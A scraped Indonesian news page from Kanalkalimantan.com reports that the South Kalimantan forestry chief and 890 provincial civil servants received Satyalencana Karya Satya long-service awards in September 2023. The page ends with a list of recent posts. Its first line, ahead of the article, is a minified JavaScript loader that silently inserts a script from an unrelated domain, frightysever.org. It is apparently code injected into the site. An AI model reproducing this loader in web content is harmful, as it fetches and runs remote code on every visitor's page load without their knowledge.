(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Dishut Prov Kalsel

Kadishut Kalsel Terima Penganugerahan Satyalencana Karya Satya


KANALKALIMANTAN.COM, BANJARBARU -Kadishut Prov Kalsel Hj. Fathimatuzzahra menerima penganugerahan Satyalencana Karya Satya usai mengikuti apel gabungan awal bulan September 2023. Apel yang dilaksanakan dihalaman kantor Sekretariat Daerah Provinsi Kalsel ini dipimpin langsung Gubernur Kalsel H. Sahbirin Noor dan diikuti seluruh pegawai SKPD lingkup Pemrov Kalsel, Senin (4/9/2023).

Gubernur yang akrab disapa Paman birin itu dalam amanatnya menyampaikan bahwa apel ini merupakan salah satu contoh komitmen Aparatur Sipil Negara (ASN) dalam mengabdi pada negara. Selain itu, juga disampaikan Kalsel akan memerangi bersama Kebakaran Hutan dan Lahan (Karhutla) yang terjadi dalam beberapa waktu belakangan di Kalsel.

“Selain itu, memasuki musim kemarau ini saya meminta para SKPD terkait siap siaga bencana terutama bencana Karhutla dengan menyiapkan tong air, alat pemadam kebakaran dikantor masing-masing, dan mobil oprasional. kolaborasi antar SKPD harus kita jaga bersama agar dapat menciptakan pengendalian bencana karhutla yang hebat dan kita akan perangi bersama bencana Karhutla di Kalsel” kata Paman Birin.

Usai pelaksanaan apel gabungan awal bulan september 2023 digelar, dilanjutkan dengan acara kegiatan penyematan pin penganugerahan Satyalencana Karya Satya bagi PNS di lingkup Pemprov Kalsel yang disematkan langsung oleh Gubernur Kalsel Paman Birin di Gedung Idham Khalid Setda Prov Kalsel.

Paman birin menyampaikan bahwa dalam acara penganugerahan tanda kehormatan Satyalancana Karya Satya X, XX dan XXX Tahun dapat menjadi motivasi para ASN untuk berkarya dan bekerja secara lebih baik lagi di dalam memberikan pelayanan kepada masyarakat secara tulus.

“Kepada penerima tanda kehormatan Satyalancana Karya Satya saya mengucapkan selamat, semoga penganugrahan tanda kehormatan ini semakin mendorong semangat kita untuk memberikan pengabdian terbaik untuk bangsa dan negara” kata paman birin sapaan akrab Sahbirin Noor, Gubernur Kalsel.

Penyematan pin penganugerahan yang diberikan kepada para ASN di lingkup Pemprov Kalsel tersebut karena dianggap telah memenuhi syarat-syarat untuk mendapatkan tanda kehormatan, masa bekerja secara terus menerus selama 10 (sepuluh), 20 (dua puluh) dan 30 (tiga puluh) tahun.

Kadishut Prov Kalsel tahun ini mendapat penyematan tanda kehormatan masa bekerja secara terus menerus selama 20 (dua puluh) tahun. Selain itu, Kabid Perencanaan & Pemanfaatan Hutan Dishut Kalsel Rolena Kinawati juga mendapat tanda kehormatan masa bekerja secara terus menerus selama 30 (tiga puluh) tahun. Total ada 40 ASN dari lingkup Dinas Kehutanan Provinsi Kalsel yang terdiri dari UPTD BPTH, KPH Sengayam, KPH Cantung, KPH Kusan, dan KPH Kayu Tangi yang juga mendapatkan tanda kehormatan di penganugerahan Satyalencana Karya Satya tahun ini.

Pada acara penyematan Penghargaan Satyalencana Karya Satya kali ini, total 890 pegawai ASN lingkup Pemprov Kalsel mendapatkan tanda kehormatan langsung dari Gubernur Kalsel Paman Birin.(Kanalkalimantan.com/al)
.
.
.


Aldi Riduan

Uploader Terpercaya Kanal Kalimantan

Recent Posts

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

8 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

10 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

10 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

10 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

12 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

13 jam ago

This website uses cookies.